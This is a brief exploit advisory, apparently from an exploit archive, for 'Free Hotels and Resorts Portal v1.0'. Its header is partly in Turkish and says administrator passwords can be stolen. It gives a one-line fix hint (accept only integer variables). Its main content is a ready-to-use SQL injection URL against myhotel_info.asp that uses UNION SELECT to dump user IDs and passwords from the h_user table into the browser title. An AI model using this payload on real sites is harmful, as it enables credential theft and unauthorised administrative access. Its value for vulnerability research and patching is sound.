< ------------------- header data start ------------------- >

#############################################################

# Application Name : Free Hotels and Resorts Portal v1.0 SQL Inj.

# Vulnerable Type : SQL Inj.

# Infection : Administrator Sifreleri Çalinabilir.

# Bug Fix Advice : Degiskenler Sadece Integer Alacak Sekilde Düzenlenmeli

# Script : Free Hotels and Resorts Portal, version 1.0

# Price : $Free

# author : Bug Researchers/xoron


#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

myhotel_info.asp?id=-1+union+select+0,pwd,2,3,userid,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+h_user

Warning!: You will see username and password on ur web browser’s title..!

< -- bug code end of -- >